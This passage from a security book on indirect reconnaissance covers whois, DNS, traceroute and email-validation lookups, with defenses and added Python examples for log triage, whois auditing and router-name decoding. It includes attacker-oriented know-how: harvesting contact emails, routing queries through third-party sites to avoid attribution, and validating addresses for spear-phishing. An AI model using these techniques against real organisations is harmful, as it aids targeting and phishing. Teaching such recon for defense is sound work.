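2010-10-27 14:04:03 DROP src=198.51.100.23 dst=192.0.2.7 proto=tcp dpt=445
2010-10-27 14:04:05 DROP src=169.254.3.3 dst=192.0.2.7 proto=udp dpt=137
2010-10-27 14:04:09 DROP src=127.0.0.1 dst=127.0.0.1 proto=tcp dpt=80
2010-10-27 14:04:11 DROP src=172.20.8.1 dst=192.0.2.7 proto=tcp dpt=3389
2010-10-27 14:04:12 DROP src=192.0.2.77 dst=192.0.2.7 proto=tcp dpt=23
"""

SRC_RE = re.compile(r"\bsrc=(\d{1,3}(?:\.\d{1,3}){3})\b")


def classify(address):
    """Return the reserved-range label for an IPv4 address, or 'external'."""
    ip = ipaddress.ip_address(address)
    for network, label in RESERVED_BLOCKS:
        if ip in network:
            return label
    return "external"


def triage(log_text):
    """Split log lines by source address. Reserved sources come back with
    their label so they can be explained (a LAN host, a misconfiguration,
    or spoofing); external sources come back for follow-up."""
    reserved, external = [], []
    for line in log_text.splitlines():
        match = SRC_RE.search(line)
        if not match:
            continue                       # no parsable source on this line
        src = match.group(1)
        label = classify(src)
        if label == "external":
            external.append(src)
        else:
            reserved.append((src, label))
    return {"reserved": reserved, "external": external}


def summarize(log_text):
    """Count sources per category; the private and loopback buckets are
    the ones that are not an attack by IANA."""
    result = triage(log_text)
    counts = Counter(label for _, label in result["reserved"])
    counts["external"] = len(result["external"])
    return dict(counts)


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for src, label in result["reserved"]:
        print(f"{src:16} {label}")
    print("external sources:", ", ".join(result["external"]))
    print(summarize(SAMPLE_LOG))
```

A private source address arriving on the Internet-facing interface is still worth a look: it is either spoofed or a sign the perimeter filter is missing an anti-spoofing rule.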


To query via a whois website, or in a web browser, go to www.whois.net or www.internic.net/whois.html. 


[Screenshot: the InterNIC Whois Search page at http://www.internic.net/whois.html, with www.microsoft.com entered and the Domain search type selected (the other options are Registrar and Nameserver). The page notes that it covers .aero, .arpa, .asia, .biz, .cat, .com, .coop, .edu, .info, .int, .jobs, .mobi, .museum, .name, .net, .org, .pro, and .travel; that country-code domains should be tried at Uwhois.com; and that .com and .net results, provided courtesy of Verisign Global Registry, contain only technical information about the registered domain name and referral information for its registrar, since registrars maintain the contact information in the Shared Registration System model.]


1. From a Linux system, type the following command to retrieve whois information: whois www.microsoft.com 

Information we can gain: 


[Screenshot: the output of whois www.microsoft.com in a Konsole shell on BackTrack.]


As you can see from this example, we can get detailed contact information about the domain 
we entered. It's important to narrow your queries, because in certain circumstances if you were to 
just type in, say, "Microsoft.com," you can get every domain registered (mostly spam sites) that 
have the word in your search, such as www.microsoft.com.clickme.com. The most interesting 
pieces of information contained are the administrative contacts. Many times people will put in 
their full name and addresses, along with their email and additional contact information. Notice 
the email address scheme that's in the whois query. Sometimes these can be the same as the user's 
actual login account. For instance, if we assume that the hostmaster's login account could be 
msnhsft, this would be a very relevant avenue of attack for some type of authentication attack. 
Next we can also identify the name servers, shown in the organizations. Using these name servers, 
we can do further reconnaissance to obtain additional domains and IP addresses that may be of 
value to us. 

How to search for email addresses: http://ws.arin.net/whois/. 

Command: whois @"insertdomain".com. 


[Screenshot: ARIN WHOIS Database Search (http://ws.arin.net/whois/) for "@google.com". The results list every ARIN point-of-contact handle registered with a google.com address: abuse and network administration role contacts (for example ABUSE2410-ARIN, NETWO2832-ARIN) plus more than a dozen named individuals, each with an email address and phone number. Footer: ARIN WHOIS database, last updated 2010-07-03 20:00; links to the APNIC, LACNIC, RIPE, InterNIC and AfriNIC WHOIS servers.] 


In this query, putting the @ sign before our search turns up every email address listed 
as a technical contact for that domain. This is a very easy way for hackers to query the domain to 
identify targets. Additionally, once again you can see the organization's email naming 
convention. So it's likely easy for a hacker to work out an individual's email address if he knows 
a name. 


How to Defend 


In order to defend against this type of research gathering, IT administrators need to limit the 
amount of information available to users. Therefore, never include actual information about your 
company that is viewable via a whois query, especially anything that gives an attacker a specific 
account to attack. 
Additionally, while you shouldn't falsify the information in your whois record because someone 
may need to legitimately contact you, your company can register via a domain proxy service. 
Typically, domain registrars will offer an additional service for a fee to register and maintain 
your domain name via a proxy. This makes the proxy's information public, not your company's 
information. Therefore, if someone tries to contact you, they contact the proxy service and 
the service relays the information to you. In addition to the root server, there are also other 
whois servers, and many third-party tools are available to obtain lots of indirect intelligence. 
Many of these use their own interfaces to query whois databases and much more. Once again, the 
same defenses apply. 


Domain Dossier: Central Ops 


Central Ops (www.centralops.net) is a website of network utilities to gather intelligence on 
targets (normally web administrators use it for diagnostic information). However, it is a 
valuable tool for doing indirect research on targets. Hackers can issue network commands via 
this third-party tool, which limits their ability to be traced and helps prevent the commands from 
being attributed back to them. 


[Screenshot: Central Ops Domain Dossier (http://centralops.net/co/) for yahoo.com, with the domain whois record, DNS records, traceroute, network whois record and service scan options selected. Address lookup: canonical name yahoo.com.; addresses 209.131.36.159, 209.191.93.53, 69.147.114.224.] 


As you can see, we can perform a domain name whois lookup straight from the Central Ops 
website using the Domain Dossier feature. This will query not only ARIN but also the InterNIC 
databases for domain and IP information. As you can see in the image, it also tells us when the 
domain expires. 
Domain Whois record 


Queried whois.internic.net with "dom yahoo.com"... 


Domain Name: YAHOO.COM 

Registrar: MARKMONITOR INC. 

Whois Server: whois.markmonitor.com 
Referral URL: http://www.markmonitor.com 
Name Server: NS1.YAHOO.COM 

Name Server: NS2.YAHOO.COM 

Name Server: NS3.YAHOO.COM 

Name Server: NS4.YAHOO.COM 

Name Server: NS5.YAHOO.COM 

Status: clientDeleteProhibited 
Status: clientTransferProhibited 
Status: clientUpdateProhibited 
Status: serverDeleteProhibited 
Status: serverTransferProhibited 
Status: serverUpdateProhibited 
Updated Date: 18-nov-200 

Creation Date: 18-jan-1995 
Expiration Date: 19-jan-2012 


>>> Last update of whois database: Tue, 13 Oct 2009 02:52:04 UTC <<< 


As shown in the whois query in the image, diving in deep the hacker can see the different name 
servers that Yahoo or the site targeted uses. The hacker may want to run additional queries against 
the domain servers and/or the IP addresses associated with these servers in order to get additional 
pertinent information. 


Queried whois.markmonitor.com with "yahoo.com"... 


Registrant: 
Domain Administrator 
Yahoo! Inc. 
701 First Avenue 
Sunnyvale CA 94089 
US 
domainadmin@yahoo-inc.com +1.4083493300 Fax: +1.4083493301 


Domain Name: yahoo.com 


Registrar Name: Markmonitor.com 
Registrar Whois: whois.markmonitor.com 
Registrar Homepage: http://www.markmonitor.com 


Administrative Contact: 

Domain Administrator 

Yahoo! Inc. 

701 First Avenue 

Sunnyvale CA 94089 

US 

domainadmin@yahoo-inc.com +1.4083493300 Fax: +1.4083493301 

Technical Contact, Zone Contact: 
Domain Administrator 
Yahoo! Inc. 
701 First Avenue 
Sunnyvale CA 94089 
US 
domainadmin@yahoo-inc.com +1.4083493300 Fax: +1.4083493301 

Created on.............: 1995-01-18. 
Expires On.............: 2012-01-18. 
Record last updated on.: 2009-07-07. 


As we can see in this example whois record, the individual performing the query can also 
determine once again who the registrant is and the contact information for that registrant. Many 
hackers or domain squatters pay attention to the expiration date of the domain, to try to grab it. A 
new law called the Anticybersquatting Consumer Protection Act prevents people from registering 
a domain name with bad faith to profit on someone else's trademark. 
Defense against Cyber Squatters 


Don't forget to pay the bill to your domain hosting company! Make sure your contact information 
is up to date so they can reach you. Service providers now allow users to backorder 
a domain, so if for any reason a domain expires, someone can easily grab it and take control. 
However, when a domain is past the expiration date, it goes into what is called expired status. The 
domain is then considered disabled, and this gives the owner one last opportunity to pay his dues 
to the registrar. After those 40 days or so the owner gets additional time to re-register; after 
that the domain is locked for deletion. After 5 days or so the name is deleted from the ICANN 
database and anyone can pick it up again (the whole process takes about 75 days). Therefore, 
pay your registrar and hosting bills! 
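Both of the defenses above, keeping personal login-style contacts out of the whois record and catching the expiration date before a squatter does, can be checked automatically against your own domains. The following Python is an added example, not code from the book or from any registrar; the record it parses is constructed in the style of the registrar and InterNIC output shown earlier, and the role-mailbox list and 60-day warning window are assumptions.

```python
"""Audit a whois record for leaked contact names and looming expiry (added example)."""
import re
from datetime import date, datetime

# Role mailboxes that do not mirror an individual's login account (assumption).
ROLE_ACCOUNTS = {"hostmaster", "domainadmin", "postmaster", "abuse", "noc",
                 "dns", "admin", "webmaster", "security", "domains"}
# Date styles seen in the records above: 2012-01-18 (registrar) and 19-jan-2012 (InterNIC).
DATE_FORMATS = ("%Y-%m-%d", "%d-%b-%Y")
DATE_RE = re.compile(r"(\d{4}-\d{2}-\d{2}|\d{1,2}-[A-Za-z]{3}-\d{4})")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def parse_date(text):
    """Parse either date style; returns None for anything unrecognised."""
    for fmt in DATE_FORMATS:
        try:
            return datetime.strptime(text.strip(" ."), fmt).date()
        except ValueError:
            continue
    return None


def parse_whois(record):
    """Pull expiry date, contact emails and name servers out of raw whois text."""
    info = {"expires": None, "emails": set(), "name_servers": set(), "proxied": False}
    for line in record.splitlines():
        low = line.lower()
        if "expir" in low:                       # "Expires On", "Expiration Date"
            m = DATE_RE.search(line)
            if m:
                info["expires"] = parse_date(m.group(1))
        elif low.startswith("name server:"):
            info["name_servers"].add(line.split(":", 1)[1].strip().lower())
        if "privacy" in low or "proxy" in low:   # registrar proxy service in use
            info["proxied"] = True
        for addr in EMAIL_RE.findall(line):
            info["emails"].add(addr.lower())
    return info


def audit_whois(record, today, warn_days=60):
    """Return findings a domain owner should act on, in the order found."""
    info = parse_whois(record)
    findings = []
    if info["expires"] is None:
        findings.append("no expiration date found: check the registrar's record")
    else:
        left = (info["expires"] - today).days
        if left < 0:
            findings.append(f"domain expired {-left} days ago: renew before the grace period ends")
        elif left <= warn_days:
            findings.append(f"domain expires in {left} days: pay the registrar now")
    if not info["proxied"]:
        for addr in sorted(info["emails"]):
            if addr.split("@", 1)[0] not in ROLE_ACCOUNTS:
                findings.append(f"{addr} looks like a person's login name: use a role "
                                "mailbox or a registrar proxy")
    return findings


# Constructed record in the style of the registrar output quoted above.
SAMPLE_RECORD = """\
Domain Name: example-corp.com
Name Server: NS1.EXAMPLE-CORP.COM
Name Server: NS2.EXAMPLE-CORP.COM
Registrant:
  Domain Administrator
  Example Corp.
  domainadmin@example-corp.com +1.5555550100
Administrative Contact:
  J. Smith
  jsmith@example-corp.com +1.5555550101
Technical Contact, Zone Contact:
  Hostmaster
  hostmaster@example-corp.com +1.5555550102
Created on.............: 1995-01-18.
Expires On.............: 2012-01-18.
Record last updated on.: 2009-07-07.
"""

if __name__ == "__main__":
    for finding in audit_whois(SAMPLE_RECORD, date(2011, 12, 1)):
        print("-", finding)
```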


DNS Records 


[Screenshot: Central Ops DNS records for yahoo.com] 

name       class  type  data                                            time to live 
yahoo.com  IN     SOA   server: ns1.yahoo.com                           1800s (00:30:00) 
                        email: hostmaster.yahoo-inc.com 
                        serial: 2009101303 
                        refresh: 3600 
                        retry: 300 
                        expire: 1814400 
                        minimum: 600 
yahoo.com  IN     A     209.191.93.53                                   21600s (06:00:00) 
yahoo.com  IN     A     69.147.114.224                                  21600s (06:00:00) 
yahoo.com  IN     A     209.131.36.159                                  21600s (06:00:00) 
yahoo.com  IN     MX    preference: 1  exchange: d.mx.mail.yahoo.com    7200s (02:00:00) 
yahoo.com  IN     MX    preference: 1  exchange: e.mx.mail.yahoo.com    7200s (02:00:00) 
yahoo.com  IN     MX    preference: 1  exchange: f.mx.mail.yahoo.com    7200s (02:00:00) 
yahoo.com  IN     MX    preference: 1  exchange: g.mx.mail.yahoo.com    7200s (02:00:00) 
yahoo.com  IN     MX    preference: 1  exchange: a.mx.mail.yahoo.com    7200s (02:00:00) 
yahoo.com  IN     MX    preference: 1  exchange: b.mx.mail.yahoo.com    7200s (02:00:00) 


In this example, you can also see the top-level DNS records for www.yahoo.com. Here we can 
see the class; IN is for the Internet. We are most concerned with the type A records. In DNS 
resource records, type A returns a 32-bit IPv4 address; AAAA returns a 128-bit IPv6 
address. For more information on DNS records, google "DNS records." Remember that hackers 
can't know everything and they will constantly be looking up new information they find to see 
what it means. A records are IP addresses for Yahoo's web servers. In this example, we can see that 
Yahoo.com's DNS IN A entries are: 


209.191.93.53 
69.147.114.224 
209.131.36.159 
These are all external addresses on which the hacker can do further research. 

In the example below you will see that if you enter any of the addresses from the DNS A 
records, they all return the Yahoo homepage. There are many reasons companies or individuals may 
use multiple web servers. This may be for load balancing (using multiple servers to host web pages), 
for authentication, or for other server functions. However, hackers will try to determine as many 
IP addresses to attack as possible, as these are all avenues into the enterprise. 


[Screenshot: browsing to http://209.131.36.159/ returns the Yahoo! homepage (dated Oct 17, 2009).] 


You may notice that the three IP addresses are in completely different IP address ranges. If we 
use Central Ops to further investigate this, we can see that the following ranges are assigned to 
the domain we investigated: 


209.191.64.0—209.191.127.255 
69.147.64.0—69.147.127.255 
209.131.32.0—209.131.63.255 


From the domain we investigated, the hacker could also do further research on these IP address 
ranges to see what other avenues he can find. 


Traceroute 


Traceroute is a tool used by network administrators to troubleshoot endpoint-to-endpoint network 
communication. Using this tool allows someone to determine the number of router hops 
and other information between the source and destination. The hacker can use the traceroute 
command externally to figure out all of the routers or hops between the hacker and the 
target, or to identify other network devices of value. Additionally, network administrators can 
use this tool to determine where packets are being dropped, latency delays, and incorrect routing 
of network equipment when they are trying to fix network issues. Traceroute works by using 
the time to live, or TTL, feature of the transmission control protocol (TCP)/IP. Traceroute 
relies upon the internet control message protocol, or ICMP. Basically, an IP packet contains 
an 8-bit TTL field in the IP header, which is nominally measured in seconds. Whenever an IP packet 
is sent over the Internet and a router forwards it, the router must decrease this TTL value at least 
by 1, and possibly more depending on how long the router holds the packet. If a router receives 
a packet and the TTL value is 0, then the router knows to discard the packet and no longer 
forward it. 

Therefore, every time a packet passes through a new router, that is considered one hop and the TTL 
value is decreased by 1. Say for instance there are three hops between host A and host B; there 
would then be three routers between the hosts. The routers will only forward the packet while the 
Time to Live value has not run out. When a router receives a packet, it checks the TTL value, 
decreases the value by 1, and sends it off to the next router in the sequence. Whenever that TTL 
value counts down to 0, the router stops forwarding the packet and sends a message back 
to the original sender of the packet. 

This message is an "ICMP time exceeded" message, although sometimes when using trace- 
route in Linux/Unix it defaults to the user datagram protocol (UDP) on ports 33434 
and above. This range is supposed to be unused, so you get an ICMP port unreachable message 
when the probe reaches the destination. However, the UDP implementation of traceroute relies upon 
the destination sending the ICMP unreachable message; if a firewall or a legitimate program is using 
that port then you can't know when the trace ends. 

With modern firewalls blocking unknown ports, TCP scans are more 
reliable. In this sequence, the hacker specifies a known TCP port, as we know this will 
go through the firewall. The TCP method uses the half-open TCP handshake, which pre- 
vents many applications from seeing the probe. As you network geeks know, whenever a network 
connection is made using TCP, a reliable three-way handshake happens: SYN, SYN ACK, 
and ACK. 

Here is an easy way to understand a TCP connection: Host A wants to make a TCP connec- 
tion with Host B. 


1. Host A > B SYN: "I'm Host A and I want to talk." 

2. Host B > A ACK + SYN: "I acknowledge you want to talk and I want to talk too." 
The connection is half open until the final acknowledgment is sent. 

3. Host A > B ACK: "Acknowledged." 


During this sequence, in our TCP request the traceroute only sends a SYN and waits for the SYN + 
ACK; this is what's called "half open," since Host B is waiting for the ACK. Now when you send a 
TCP request to a port that is not listening, a TCP reset is sent back. For an actively listening port 
a SYN + ACK is sent back; instead of answering with an ACK, the Linux traceroute program in TCP 
mode sends back a TCP reset, so the application never takes notice. In Linux we can actually 
specify which UDP and TCP ports to probe and which TCP flags to send. You can even send raw 
IP packet data. 

Some hackers know that they have all of these options available, and that shapes the way they 
use the traceroute command. If you are interested in all the features of traceroute then type 
"man traceroute" in Linux. 

Regardless, this technique shows the route of the packet to the destination network. Network 
engineers and administrators use this to diagnose network failures or troubleshoot networks, such 
as a router using incorrect routes, bad ACL implementations, or just downed links. The hacker 
using this protocol can determine more IP address ranges and hosts for further intelligence 
gathering, and can even use this TCP, UDP, and ICMP protocol behavior to gain in-depth knowl- 
edge about his victim. 
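To make the TTL mechanics above concrete, here is an added Python model (not code from the book) of the path discovery just described: each router decrements the TTL and answers with an ICMP time-exceeded when it reaches zero, and a perimeter that drops outbound ICMP, the defense recommended later in this chapter, hides everything behind it from the ICMP and UDP variants but not from a TCP SYN probe to an allowed port. The router addresses and the firewall position are constructed.

```python
"""Model of traceroute path discovery via the IP TTL (added example).

Constructed topology: two upstream routers, a perimeter firewall, two internal
routers and a destination host. Nothing here touches the network."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Path:
    routers: List[str]                 # router addresses, sender -> destination
    destination: str
    firewall_after_hop: Optional[int] = None  # hops past this index are inside
    block_icmp_egress: bool = False    # perimeter drops ICMP leaving the network
    dest_port_open: bool = True        # state of the port a TCP SYN probe hits

    def inside(self, hop_index: int) -> bool:
        """True when hop_index (1-based, destination = len+1) is behind the firewall."""
        return self.firewall_after_hop is not None and hop_index > self.firewall_after_hop


def send_probe(path: Path, ttl: int, mode: str) -> Tuple[Optional[str], Optional[str]]:
    """Forward one probe with the given TTL.

    Returns (replying address, reply kind), or (None, None) when nothing comes
    back, which traceroute prints as '*'."""
    for idx, router in enumerate(path.routers, start=1):
        ttl -= 1                       # every router decrements TTL by at least 1
        if ttl == 0:
            # TTL exhausted: the router discards the packet and should answer
            # with ICMP "time exceeded" ...
            if path.block_icmp_egress and path.inside(idx):
                return None, None      # ... unless the perimeter drops that ICMP
            return router, "time-exceeded"
    # The probe survived every router and reached the destination host.
    dest_idx = len(path.routers) + 1
    if mode == "tcp":
        # Half-open probe: SYN/ACK from an open port or RST from a closed one.
        # Neither is ICMP, so an ICMP egress filter does not hide it; the
        # prober answers a SYN/ACK with RST instead of completing the handshake.
        return path.destination, ("syn-ack" if path.dest_port_open else "rst")
    if mode == "icmp":
        reply = "echo-reply"
    elif mode == "udp":
        reply = "port-unreachable"     # high UDP port 33434+ is expected closed
    else:
        raise ValueError(f"unknown probe mode {mode!r}")
    if path.block_icmp_egress and path.inside(dest_idx):
        return None, None
    return path.destination, reply


def traceroute(path: Path, mode: str = "icmp", max_hops: int = 30) -> List[str]:
    """Raise the TTL from 1 until the destination itself answers."""
    hops = []
    for ttl in range(1, max_hops + 1):
        who, _kind = send_probe(path, ttl, mode)
        hops.append(who or "*")
        if who == path.destination:
            break
    return hops


# Constructed example (TEST-NET addresses): 198.51.100.x is the ISP, 203.0.113.x
# is the target's network behind a perimeter that drops outbound ICMP.
SAMPLE_PATH = Path(
    routers=["198.51.100.1", "198.51.100.9", "203.0.113.1", "203.0.113.7"],
    destination="203.0.113.80",
    firewall_after_hop=2,
    block_icmp_egress=True,
)

if __name__ == "__main__":
    for mode in ("icmp", "udp", "tcp"):
        print(f"{mode:>4}: {traceroute(SAMPLE_PATH, mode, max_hops=8)}")
```

With the filter in place the ICMP and UDP traces show only the two ISP hops and then stars forever, while the TCP trace still ends at the destination; dropping the filter makes all four routers visible in every mode.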


Commands to Perform a Command Line Traceroute 


■ Windows terminal: tracert www.yahoo.com 
■ Linux: traceroute -T for TCP SYN probes; traceroute -I for ICMP ECHO probes 
■ To perform a TCP traceroute: traceroute -T -p 80 domainname.com 


[Screenshot: root@bt Konsole shell session running the traceroute command.] 


The Linux command line tool gives much flexibility to the traceroute command; you can also 
change the packet size. It's important to note that we are performing external reconnaissance on our 
targets. Therefore, the hacker knows he would have to use some type of proxy and wouldn't want 
to use his direct IP address in order to prevent being caught. Therefore, we can use a service such 
as Central Ops to proxy our traceroute. In the next chapter, we will go into more direct scanning 
and research methods, as the focus in this chapter is indirect. 


Traceroute: Central Ops 


Now go to CentralOps.net and perform a traceroute. Note there are also many other websites 
out there that will perform these types of network utilities. As you can see from the image, the 
traceroute will quickly convert your domain to an IP address, similar to ping. You can also see all 
of the IP addresses associated in the traceroute, and their DNS hostname if available. RTT stands 
for "round trip delay time," the time it takes for each hop in the trace. 
[Screenshot: Central Ops Traceroute (http://centralops.net/co/) to yahoo.com] 

Tracing route to yahoo.com [209.131.36.159]... 
hop  rtt  rtt  rtt  ip address       fully qualified domain name 
  1    1    0    0  70.84.211.97     61.d3.5446.static.theplanet.com 
  2    0    0    0  70.87.254.1      po101.dsr01.dlistx5.theplanet.com 
  3    0    0    0  70.85.127.105    po51.dsr01.dlistx3.theplanet.com 
  4    0    0    0  70.87.253.1      et3-1.ibr03.dlistx3.theplanet.com 
  5    0    0    0  70.87.253.178    b2.fd.5746.static.theplanet.com 
  6   22   22   23  216.115.96.58    as-3.pat2.dnx.yahoo.com 
  7   55   47   47  216.115.101.128  as-0.pat1.pao.yahoo.com 
  8   48   48   47  216.115.101.33   ae-2.pat2.pao.yahoo.com 
  9   49   50   50  216.115.107.51   ae0-p141.msr1.sp1.yahoo.com 
 10   50   50   47  209.131.32.21    te-9-1.bas-a1.sp1.yahoo.com 
 11   49   50   50  209.131.36.159   b1.www.vip.sp1.yahoo.com 
Trace complete 

Service scan 
  FTP - 21 
  SMTP - 25 
  HTTP - 80: 301 Moved Permanently (Content-Type: text/html; charset=utf-8) 
  POP3 - 110 
  IMAP - 143 


Traceroute: Interpretation of DNS 


One of the most interesting things about traceroute is interpreting the DNS entries across these links. 
Hackers can easily determine the locations of the routers themselves, the OS being used, interface 
types and names, what the router is being used for, and the relationships between the different car- 
riers! This is a very valuable tool! We can also spot where DNS changes between providers, which 
allows us to focus on our target. However, sometimes we get no DNS translation at all, maybe because 
traceroute is being blocked by the device. 


■ te-3-2-10g.ar5.nyc1.gblx.net (208.51.134.25) 727.945 ms 395.706 ms 433.280 ms 
■ 204.245.39.226 (204.245.39.226) 711.936 ms 801.340 ms 768.942 ms 
■ xe-3-0-0.msr2.ac2.yahoo.com (216.115.108.135) 725.340 ms 
■ te-8-1.bas-a1.ac4.yahoo.com (76.13.0.173) 143.607 ms 


This is the output of four hops of a traceroute. In the first hop the hacker will see te. 

To put this in some context, te is typically an interface assignment for 10-GB Ethernet on a 
Cisco network device. Additionally, the first hop is located in New York City, and the "ar" in this 
hop is typically found on customer-designated routers, as it is important to differentiate between 
different tiers of routers and their customers. 

Here's an example of three other select hops: 


■ sl-crs1-nyc-0-6-0-0.sprintlink.net (144.232.24.97) 525.976 ms 765.292 ms 
■ nyc-brdr-01.inet.qwest.net (205.171.1.133) 931.210 ms 506.813 ms 
■ nyc-core-02.inet.qwest.net (205.171.134.9) 483.446 ms 680.371 ms 
Obviously, here the hacker can leverage the fact that he can tell the difference between the ISP link 
and the border and even the core router! He would then go into more direct scanning 
techniques to determine the router type and Cisco IOS (internetwork operating system) version 
information. What might the hacker want to focus his efforts on? 
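A defender can run the same interpretation over a trace into their own network to see what the router naming convention gives away before anyone else reads it. The Python below is an added example, not the book's code; its decoding tables are illustrative assumptions (the text gives only te = 10-GB Ethernet on Cisco gear and ar = customer-facing router), and the hop numbers in the sample are constructed around the hostnames quoted above.

```python
"""Decode what traceroute reverse-DNS names give away (added example)."""
import re

# Illustrative decoding tables, not an authoritative standard: the text above
# gives only te = 10-GB Ethernet on Cisco gear and ar = customer-facing router;
# the remaining entries are common carrier naming conventions (assumptions).
INTERFACE_HINTS = {
    "te": "TenGigabitEthernet (Cisco, 10 Gb/s)",
    "xe": "10 Gb/s Ethernet (Juniper)",
    "ge": "Gigabit Ethernet",
    "ae": "aggregated Ethernet (LAG, Juniper)",
    "po": "port-channel (LAG, Cisco)",
    "so": "SONET / POS",
    "fa": "FastEthernet",
    "et": "Ethernet",
}
ROLE_HINTS = {
    "ar": "access (customer-facing) router",
    "brdr": "border router", "br": "border router",
    "core": "core router", "cr": "core router",
}
SITE_HINTS = {"nyc": "New York City", "pao": "Palo Alto"}

# "hop  name (ip)  rtt ms ..." as printed by traceroute; the hop number is optional.
HOP_RE = re.compile(r"^\s*(?:(\d+)\s+)?(\S+)\s+\((\d{1,3}(?:\.\d{1,3}){3})\)\s*(.*)$")


def parse_hop(line):
    """Split one traceroute line into hop number, name, IP and RTT samples."""
    m = HOP_RE.match(line)
    if not m:
        return None
    num, name, ip, rest = m.groups()
    return {
        "hop": int(num) if num else None,
        "name": None if name == ip else name.lower(),   # None = no reverse DNS
        "ip": ip,
        "rtt_ms": [float(v) for v in re.findall(r"([\d.]+)\s*ms", rest)],
    }


def interpret(name):
    """Derive provider, interface type, router role and site from a hostname."""
    labels = name.split(".")
    hints = {"provider": ".".join(labels[-2:]), "interface": None,
             "role": None, "site": None}
    # te-3-2-10g.ar5.nyc1...: the leading letters of the first label name the interface
    m = re.match(r"[a-z]+", labels[0])
    if m and m.group() in INTERFACE_HINTS:
        hints["interface"] = INTERFACE_HINTS[m.group()]
    # Every label or dash-separated token, with trailing digits removed (ar5 -> ar)
    for token in re.split(r"[.-]", name):
        token = re.sub(r"\d+$", "", token)
        if hints["role"] is None and token in ROLE_HINTS:
            hints["role"] = ROLE_HINTS[token]
        if hints["site"] is None and token in SITE_HINTS:
            hints["site"] = SITE_HINTS[token]
    return hints


def analyze(trace_text):
    """Parse a whole trace and attach hints to every hop that resolved."""
    hops = []
    for line in trace_text.splitlines():
        hop = parse_hop(line)
        if hop:
            hop["hints"] = interpret(hop["name"]) if hop["name"] else None
            hops.append(hop)
    return hops


def provider_boundaries(hops):
    """(from_index, to_index, from_provider, to_provider) wherever the provider
    changes between consecutive resolved hops; unresolved hops are skipped."""
    out, prev = [], None
    for i, hop in enumerate(hops):
        if not hop["hints"]:
            continue
        prov = hop["hints"]["provider"]
        if prev and prov != prev[1]:
            out.append((prev[0], i, prev[1], prov))
        prev = (i, prov)
    return out


# Sample built from the hostnames quoted above; the hop numbers are constructed.
SAMPLE_TRACE = """\
 5  te-3-2-10g.ar5.nyc1.gblx.net (208.51.134.25)  727.945 ms  395.706 ms  433.280 ms
 6  204.245.39.226 (204.245.39.226)  711.936 ms  801.340 ms  768.942 ms
 7  xe-3-0-0.msr2.ac2.yahoo.com (216.115.108.135)  725.340 ms
 8  te-8-1.bas-a1.ac4.yahoo.com (76.13.0.173)  143.607 ms
"""

if __name__ == "__main__":
    hops = analyze(SAMPLE_TRACE)
    for hop in hops:
        print(hop["hop"], hop["ip"], hop["name"] or "(no reverse DNS)", hop["hints"])
    print("provider changes:", provider_boundaries(hops))
```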

You can defend against this by disabling all unused services! This is a constant theme through- 
out this book! In order to block a traceroute on your network, just make sure that the response 
messages aren't able to egress back to the originator. Therefore, on your firewall you could block 
ICMP outbound from your network, and/or UDP ports 33494-33534. This would at least block the 
default ICMP reply and the initial request inside your network. The best policy is to whitelist a 
firewall: only open up the ports that are positively allowed inside and outside your network. For 
inbound communications, you would only allow the standard ports for your organization and 
block everything else. It's important to note that because of firewalls, traceroute is rarely going to work 
externally against the network. However, knowing the multiple methods will allow for further 
recon techniques in direct recon inside the network. Most hackers will use the TCP method 
anyway, and typically will target a port that they know is open externally, such as 80 or 25. But 
just in case you need a refresher on creating an ACL on a Cisco device, here is how to create one: 


Router>enable 
Router#configure terminal 
Router(config)#access-list 101 deny icmp any any echo 
Router(config)#access-list 101 deny udp any any gt 32768 


Remember there is an implicit deny at the end of an ACL on Cisco devices, so you might need 
to permit things: 


■ Router(config)# access-list 101 permit ip any any 


Remember your access list doesn’t do you any good unless you assign it to an interface. So, go 
into interface mode from global configuration mode: 


■ Router(config)# interface Eth0 
■ Router(config-if)# ip access-group 101 out 


This will assign the ACL outbound to your Eth0 interface; you need to decide whether an ACL 
belongs inbound or outbound. Ideally though, you should have only trusted networks 
respond to an ICMP request. Also, you should only do whitelisting for ACLs. Therefore, Cisco 
recommends creating an extended access list, permitting ICMP only from the trusted networks 
and denying all other ICMP. 


! 
ip access-list extended ACL-TRANSIT-IN 
! 
!--- Permit ICMP packets from trusted networks only 
! 
 permit icmp host <trusted-networks> any 
! 
!--- Deny all other IP traffic to any network device 
! 
 deny icmp any any 
For more information, visit http://www.cisco.com/en/US/tech/tk648/tk361/technologies_tech_note09186a0080120f48.shtml. 
This contains common hardening techniques by Cisco to harden IOS devices. This is one of the 
best technical guides out there for securing Cisco devices. 


Disable Unused Services 


Once again, disable all unused services! This is a constant theme throughout this book! This section 
of the chapter came very close to getting into direct recon; however, there are many capabilities 
that can be used both indirectly and directly. It fits here because Central Ops can do all the 
tracerouting for you. 


Domain Check: Central Ops 


This feature of Central Ops tells whether a domain is available. It is used to see whether a 
domain is available for the taking. Pretty straightforward! 


Email Dossier: Central Ops 


[Screenshot: Central Ops Email Dossier (http://centralops.net/co/) validating email.test@hotmail.com] 

Validation results 
  Validating email.test@hotmail.com... 
  confidence rating: 0 - Bad address 
  error: RecipientRejected - Mail server rejected the email address. 
  canonical address: <email.test@hotmail.com> 

MX records 
  preference  exchange         IP address (if included) 
  5           mx1.hotmail.com  [65.55.92.184] 
  5           mx2.hotmail.com  [65.55.37.72] 
  5           mx3.hotmail.com  [65.55.37.88] 
  5           mx4.hotmail.com 

SMTP session 
  [Contacting mx1.hotmail.com [65.55.92.184]...] 
  [Connected] 
  220 snt0-mc4-f33.Snt0.hotmail.com Sending unsolicited commercial or bulk e-mail to Microsoft's computer network is prohibited. Other restrictions ... 

196 ■ Defense against the Black Arts 


The hacker can use the Email Dossier to validate an email address. To see whether or not an email 
will go through, you can actually view the SMTP session that was created. This tool is great for 
hackers because they can validate email addresses before crafting spearfish emails to the target. 
A spearfish is like a phishing email, a fake email that claims to be legitimate; however, a 
spearfish is more targeted to the user. An example of this is sending a legitimate-looking email 
from one individual to, say, the IT manager, one that the hacker is confident looks like a safe email 
or attachment to open. This is a very common technique used during the initial compromise 
in an intrusion, especially among the advanced persistent threat. This is just another way for the 
attacker to plan the attack. Additionally, this can be used to obtain the IP addresses of the email 
server, which is likely located inside the demilitarized zone (DMZ), which can be used as another 
avenue of attack. 


Site Report: Netcraft.com 


[Screenshot: Netcraft site report for www.twitter.com (http://toolbar.netcraft.com/site_report?url=http://www.twitter.com)] 

Site: http://www.twitter.com          Last reboot: unknown 
